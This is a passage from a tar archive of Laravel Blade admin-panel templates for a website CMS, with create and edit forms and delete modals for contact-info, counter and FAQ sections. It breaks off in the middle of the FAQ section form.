name="type" id="optionsRadios1" onclick="showHideTypeDiv()" value="icon" checked=""><span class="ml-3">{{ __('content.icon') }}</span> <i class="input-helper"></i> </label> </div> <div class="form-check pl-0"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-1" name="type" id="optionsRadios2" onclick="showHideTypeDiv()" value="image"><span class="ml-3">{{ __('content.image') }}</span> <i class="input-helper"></i></label> </div> </fieldset> <div class="form-group" id="icon-type"> <label for="icon" class="d-block">{{ __('content.icon') }}</label> <div class="btn-group"> <input type="hidden" name="icon" class="form-control" id="icon"> <button type="button" class="btn btn-primary iconpicker-component"><i id="icon-value" class="iconpicker-component"></i></button> <button type="button" id="iconPickerBtn" class="icp icp-dd btn btn-primary dropdown-toggle iconpicker-component" data-selected="fa-car" data-toggle="dropdown"> <span class="caret"></span> </button> <div class="dropdown-menu"></div> </div> </div> <div id="image-type" style="display: none;"> <div class="form-group" > <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64 (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title_2">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title_2"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title_2')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description_2">{{ __('content.description') }} </label> <textarea name="description" class="form-control" id="description_2" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description_2')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/contact_info/edit.blade.php����������������������������������������������������0000644�����������������00000031570�14765366573�0016026 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_contact_info') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/contact-'.$item->style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('contact-info.update', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="single-clint-area-content"> <fieldset class="form-group"> <legend class="font-14">{{ __('content.type') }}</legend> <div class="form-check pl-0 mb-2"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-2" name="type" id="optionsRadios1" onclick="showHideTypeDiv()" value="icon" {{ $item->type == 'icon' ? 'checked' : '' }}><span class="ml-3">{{ __('content.icon') }}</span> <i class="input-helper"></i> </label> </div> <div class="form-check pl-0"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-1" name="type" id="optionsRadios2" onclick="showHideTypeDiv()" value="image" {{ $item->type == 'image' ? 'checked' : '' }}><span class="ml-3">{{ __('content.image') }}</span> <i class="input-helper"></i> </label> </div> </fieldset> <div class="form-group" id="icon-type" style="{{ $item->type == 'icon' ? 'display:block' : 'display:none' }}"> <label for="icon" class="d-block">{{ __('content.icon') }}</label> <div class="btn-group"> <input type="hidden" name="icon" class="form-control" id="icon" value="{{ $item->icon }}"> <button type="button" class="btn btn-primary iconpicker-component"><i id="icon-value" class="{{ $item->icon }} iconpicker-component"></i></button> <button type="button" id="iconPickerBtn" class="icp icp-dd btn btn-primary dropdown-toggle iconpicker-component" data-selected="fa-car" data-toggle="dropdown"> <span class="caret"></span> </button> <div class="dropdown-menu"></div> </div> </div> <div id="image-type" style="{{ $item->type == 'image' ? 'display:block' : 'display:none' }}"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/contact_info/'.$item->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title_2">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title_2" value="{{ $item->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title_2')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description_2">{{ __('content.description') }} </label> <textarea name="description" class="form-control" id="description_2" rows="3">{{ $item->description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description_2')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('contact-info.destroy_image', $item->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/counter/create.blade.php�������������������������������������������������������0000644�����������������00000057027�14765366573�0015362 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.counters') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('counter.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/counter-'.$style.'.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#counterSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#counterModal">+ {{ __('content.add_counter') }}</button> </div> </div> @if (count($items) > 0) <div class="mr-3"> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('counter.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.timer') }}</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $item->timer }}</td> <td>{{ $item->title }}</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('counter.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="counterModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="counterModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('counter.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="counterSectionModal" tabindex="-1" role="dialog" aria-labelledby="counterSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="counterSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('counter-section.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#counterSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="counterSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="featureSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="counterSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('counter-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('counter-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="counterModal" tabindex="-1" role="dialog" aria-labelledby="counterModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="serviceModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('counter.store') }}" method="POST"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="timer">{{ __('content.timer') }} </label> <input type="text" name="timer" class="form-control" id="timer"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/counter/edit.blade.php���������������������������������������������������������0000644�����������������00000005104�14765366573�0015031 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_counter') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('counter.update', $item->id) }}" method="POST"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="timer">{{ __('content.timer') }} </label> <input type="text" name="timer" class="form-control" id="timer" value="{{ $item->timer }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $item->title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/faq/create.blade.php�����������������������������������������������������������0000644�����������������00000057566�14765366573�0014462 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.faqs') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('faq.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> <a class="dropdown-item" href="{{ route('faq.create', ['style' => 'style2']) }}">{{ __('content.style2') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/faq-'.$style.'.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#faqSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#faqModal">+ {{ __('content.add_faq') }}</button> </div> </div> @if (count($items) > 0) <div class="mr-3"> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('faq.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.question') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $item->question }}</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('faq.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="faqModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="faqModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('faq.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="faqSectionModal" tabindex="-1" role="dialog" aria-labelledby="faqSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="faqSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('faq-section.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }} </label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ 